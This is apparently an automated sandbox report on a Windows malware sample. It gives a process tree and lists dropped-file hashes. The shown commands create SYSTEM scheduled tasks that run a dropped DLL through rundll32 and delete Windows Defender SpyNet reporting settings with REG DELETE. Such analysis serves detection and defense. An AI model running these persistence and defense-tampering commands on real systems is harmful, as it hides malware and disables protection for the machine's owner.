C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ounCTnWLswCyVFJzQ2" /F /xml "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\jkuntBv.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PLGPATEnutnmqCGWxdq2" /F /xml "C:\Program Files (x86)\JqMoIWPtRqoDC\BrFiQZk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2192
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uWHYFRHVxuNygqWgi" /SC once /ST 00:51:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gtigoJAOxebpSqst\EnujmsbG\ZtEGFjJ.dll\",#1 /Mtsite_idbUh 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uWHYFRHVxuNygqWgi"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2204
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1596
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tbikxcbubRAutxvXV"3⤵PID:1032
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gtigoJAOxebpSqst\EnujmsbG\ZtEGFjJ.dll",#1 /Mtsite_idbUh 5254032⤵PID:1780
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gtigoJAOxebpSqst\EnujmsbG\ZtEGFjJ.dll",#1 /Mtsite_idbUh 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1824 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uWHYFRHVxuNygqWgi"4⤵PID:2928
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2476
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1640
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2268
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54ba69e7b4ada124c5728700e5974c17c
SHA1927d3d4035d5d74b22f61d3bdf2565ad6c9904c3
SHA25650a566876ca066dcb2e0ab7ca24cc76e8a973da02b59aaa06df769c6941fc278
SHA5120e6a25a06dd22336b898bcd4c01e7ae6e6c0cd63881bf1eae2963f113b6a98766286b4846d514e7b38baa370016842dc1c76ac71d67eff725b962201f6606940
-
Filesize
2KB
MD5ba22127b6c33006776dde644f48ad176
SHA1f70baebe261ef48f582083dde29d886af2304806
SHA256a35b6d2985c13947955432c0705da8ef745ea3b0316793b8f3366cc17cf54670
SHA51282104238849dd7299ac316c8505d7880d4f9e58ff21b60ccf0aa7e8f49b42d9261fa4b1ae136919f3bb3b7ffe42e69b20f1bf3cc2124b7a330289597d31a104d
-
Filesize
2KB
MD5f54b8301cec04dbedfb7de6592108d76
SHA15952d868128ff21cc4dd119af37a4b5f5d6de21b
SHA25666e56d49aa78ce0a9dca2a3b02ce25d004d14be1f4410f5d2c3fe212cb382170
SHA512ad052a719a3568cf2addd39d3b45800213428640d57d0a7eb3dc5a3f90c064f333ffbc537fe4e39b8c43368139ef1a60e8579300b1ed89fd89bdce52375d5bd4
-
Filesize
2KB
MD51427a3b52074d488665c74606ccfadca
SHA179b7de3e5fafdb6b3c045cec05c03ac4051f0dd4
SHA256c96c87e61e8dcb7aaee5a7d22586a2a5e3442d8a3fe9719a5737bcd8b53d7b7f
SHA512d9da1d237612b58522d9cac90a94464cda229f18d2895b36a336841bdd5bb23a8388ee75d718cb16586d268e2e666035077814abd16d1f9e20098bec2c275142
-
Filesize
2.0MB
MD546ab379db9816ad8d927a068ad211076
SHA11c4edce3c121e12ef1500403d7794892e813744a
SHA256d40a9dd959d1887f8edbfcb98e636aa7808c5db158114e0c6f86ff41a0b663c2
SHA512da8017f0dab61e0de5ab680f88e95e4a0c15b5df744de32244df4f14e3000f81c3ff271ae876a2b6d07e0e12533b1f2089c2485e24dd7c59b148b067ff32f2df
-
Filesize
2KB
MD565b5bcdc7083fac3714651bfbdf1722e
SHA1876b44a3619b2264d87d6b7e3f0fb5e0b6fbc523
SHA2564996a3b004adcb6d60de7504e4fa3ebf15024de3942d3255d73700ebfb34d030
SHA5122f3d776c7befbf10655e1095248481919e17b4fa6029c283494ddbeb6d052a9720b9ead8f0576696b3190b874c4b2290d13c190bf4e5ebf00fc0f631e93ea390
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD55fd34a6eb8aa80f03b9999ee58c14129
SHA1e0f4bab81b5efd5054cee50ead6aaeb923031a7d
SHA256d563bd9ce4599dfa5439dcb579f9546065124dc630b387c787b38bbdd712817b
SHA512f425a30bdb02e50d92ceae82c22fb0c6f711ee3f89ca4e9ebd12a1dfd490809d026fa286775d2bcde08ca0e32c8ce0a2c402b24f6c888fad90fa9be2c1498dee
-
Filesize
27KB
MD59312ad85e75bc2ee3f8b495667b272ec
SHA19bdb7efa822e311b5c888e5ef4e98500a37e1de3
SHA2562ac4d1cf491e3633c9a388b4257db94e98677d37151cb9c1b0ff9434171bbb8a
SHA51265ba4af0ab22d0af4a7e7ef8e91d75a0d739fb71352ad6fed4ab1a188a5df692bc78f2081deaf7ed888f7a3e69e74e7a99c1a17b12f060039e3595ca7f8dc5fa
-
Filesize
6.8MB
MD5d6ea860c7658aec47fb494c6d92f39f6
SHA10dd0a34fc875b7a8eadc9d55c0339ad6bf2da4a2
SHA256855f94dca60aa50e5bfd46cb62d3d8ef9cbe55c5f0d2b5ffd85006b7c6032f7f
SHA512a4045b237d851664c6218fde1ecff87cf1ca3e40788400f83552c5a698fc4ae7994df4a207d4abc348d9be3da1a73f3ffdeb810304a853678a880fe3641111f3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54e1a3698933a7bbd1c5519c9b9d33fc1
SHA14648141690c655ebcf5f40447407c8314634e29a
SHA256f014d9c2f49277b79103881703c3f1c7eafc08217a88407aca58a1a063b2e87f
SHA5123c8128f44927444c92436b9da3ba1cac6ced8a85f2a4024a2e2c053df38530cbbdae6d518291a9fdaa7ff7a74f055cf14a3da29d8f613d4761130eea6080d30a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57168b0601dc9ea65febcd0f1cf0e2071
SHA1d1e5fdf0a230ee1ccb47bf27a1dad6c697c3df45
SHA256e90c8262c11c0fa547e7d7eccbc78c9c23a994ff997539c885dafc0dcc906d58
SHA5129a0cae9bbe2f921f3a2f11e457ca445676e7d3adb1b656e750513911c6e02f876204391a0929a55b230bcb59a6ce7f72b9e6da2b39ec597ed7c7b330bd9f25fe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52749f47fbd64f5f37c2da1ed169ed9c6
SHA174ae9f01ee22d5b45ec1c9c328ea3e64797dfd92
SHA25665e926e605154c4f27ec9a81a73c76ff94aa22a846b4759106997b5063325042
SHA512993c35d720d78565cc5971e660fe89d4ee9774bc172706513994e560af810f49365e020f03b143c55a88290c3b78ab54ecd93ab8e9e66d8ebd1ac94d0be1bf5d
-
Filesize
6KB
MD503efd563e6ea43f2785e68a084e78ae7
SHA1f6cc371ff703450d7dd67662dd4d6b38810e1020
SHA2567ed8ca7ab328fc7ad549300c54e9e0d89ac77a175fa4fca20342603dcd5da0f4
SHA512fb681275258a84c587dbbe6cbbb0ad864ca816b1ebbc239ebbedb349ebd6ccb8803ac3de4174afbe8f5372bdb891cfc8836f86e1f466bd2f256f68edaf9adc35
-
Filesize
6.4MB
MD53689b71cfed9ea28838161ddedf8a95b
SHA1dfc97eddeed1c0ed9f426e3da8978b459cfefbca
SHA256bd43a03e67973072104236da0594c9cefaf33a07db03f7227c509a20615f863c
SHA512f29ac87d81b3dca56ea4744acb0f59d2536161648f19a7991fc3cc3c1e642fa4d552458091a744da057e1ebb8b54a61096e8cc92f651a857b7421afe27fbaadf
-
Filesize
9KB
MD5f8ab1065a84ab8f5c2d2d336395f66b7
SHA1227450dfff6377d1077981d125007a77a4895e1b
SHA25669a4e42c27870f22286945b60c72ebbd4bfa92092db55b43179a6c46373707d2
SHA512ba5bc2469cf224e15741a0b3d6ffcd16772cccf71f2a55c657ff732ae07d2a546f0882e950c61ae5a1181deb9e443263e8d41914e0604e0820ca280f264a6a6e
-
Filesize
5KB
MD58c419b5d594918ff1cb068b35299c651
SHA1ec91d3dfd7b330623da42ee366c6a2a510fe5b60
SHA2569957be03f0ce94b3d29c643515c0cbc2d35e889720fa37886b31260d3c88575d
SHA512372ac32c681d825e6e2131437c88af762a5593dc3c58a53ca6e97a7208c7f135e9cc492fd4186ea735857be522a102f92e049b20dbf51e22582609536897837a
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.4MB
MD53ebc281eb9f95d9416e68d0bb1966a31
SHA140701cd093821c86d69d5dc44b9bbd7317290773
SHA256256db73df3af334a0e19711fdd26089361ec7da2931b82c63ea37a9821e3b574
SHA5128947f14bdd30f2a76dd6338d4bcc886b6501928d5203eda7771440e6d9ff4ab5d4c08bfc214be52a2b835ffe806a1ca4ab8da43c3e74842102de5b1603f19493